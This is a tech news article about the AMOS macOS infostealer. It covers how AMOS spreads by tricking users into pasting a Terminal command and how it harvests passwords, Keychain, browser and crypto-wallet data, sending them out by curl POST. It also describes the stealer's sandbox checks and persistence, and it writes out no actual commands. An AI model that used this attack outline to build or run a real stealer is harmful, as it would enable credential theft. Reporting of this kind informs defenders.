'Mainstream malware now regularly affects macOS users' inside the relentless rise of the AMOS infostealer, one of the most dangerous macOS malware ever developed

Date:
Sun, 24 May 2026 01:05:00 +0000

Description:
AMOS malware spreads on macOS through social engineering, stealing
credentials while researchers debate whether its threat level is truly novel.

FULL STORY ======================================================================Copy link Facebook X Whatsapp Reddit Pinterest Flipboard Threads Email Share this article 0 Join the conversation Follow us Add us as a preferred source on Google Newsletter Subscribe to our newsletter AMOS relies on users executing malicious terminal commands themselves Sophos MDR identified ClickFix-style social engineering in macOS attacks Half of macOS stealer reports involved AMOS, but Apple is fighting back Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.

Instead, this malware family repeatedly exploits ordinary user behaviour by tricking users into typing a single command into their own Terminal application. A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-style ruse persuaded a victim to execute a malicious line of code manually. Latest Videos From You may like 'The prevailing wisdom used to be that macOS was at lower risk of malware
infection compared to Windows...thats no longer the case': Experts warn Mac infostealers are on the rise - here's how to stay safe Devious new
infostealer Mac malware disguises itself as official Apple tools to lure in victims Another worrying macOS malware scheme has been discovered here's how to stay safe AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, with researchers noting similar social engineering tactics in multiple macOS infostealer campaigns throughout 2025 and early 2026.

AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than doubling the detection rate of any other macOS malware family during the same period.

Furthermore, almost half of all macOS stealer customer reports in the last three months involved AMOS or its close variants.

Security firms have tracked this malware-as-a-service operation since at
least April 2023, with notable campaigns including a variant dubbed SHAMOS reported by CrowdStrike in August 2025. Are you a pro? Subscribe to our newsletter Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed! Contact me
with news and offers from other Future brands Receive email from us on behalf of our trusted partners or sponsors By submitting your information you agree to the Terms & Conditions and Privacy Policy and are aged 16 or over.

In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations. How the malware harvests passwords and data After the initial Terminal command executes a bootstrapping script, the malware immediately prompts the user for their
macOS system password.

The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file named .pass within the user's home directory. What to read next 'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets Mac users beware experts say this attack 'stood out immediately' by making a major change to try spread malware Infostealers are being disguised as Claude Code, OpenClaw and other AI developer tools

Once the password is secured, AMOS downloads a secondary payload that removes extended attributes to bypass macOS security warnings.

The stealer also checks whether it is running inside a virtual machine or sandbox environment by querying system_profiler data for indicators such as QEMU, VMware, or KVM.

The malware then proceeds to harvest an extensive range of sensitive information, including the macOS Keychain database, browser credentials from Firefox and Chrome, extension storage files, and local session tokens.

Some variants also deploy fake Ledger Wallet and Trezor Suite applications designed to steal cryptocurrency wallet seeds and credentials.

All collected files are compressed into a single archive using the ditto utility before being transmitted to attacker-controlled servers via curl POST requests.

To maintain long-term access, the malware installs a LaunchDaemon that
ensures automatic execution after every system reboot.

Despite the severity of AMOS, it is worth questioning whether security
vendors are overstating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.

The malware's heavy reliance on user consent someone must willingly paste
and run a Terminal command creates a significant barrier that technically literate users might easily avoid.

Moreover, Apple's ongoing improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective within a few operating system updates.

The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings. Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds.



======================================================================
Link to news story: https://www.techradar.com/pro/mainstream-malware-now-regularly-affects-macos-u sers-inside-the-relentless-rise-of-the-amos-infostealer-one-of-the-most-danger ous-macos-malware-ever-developed


--- Mystic BBS v1.12 A49 (Linux/64)
* Origin: tqwNet Technology News (1337:1/100)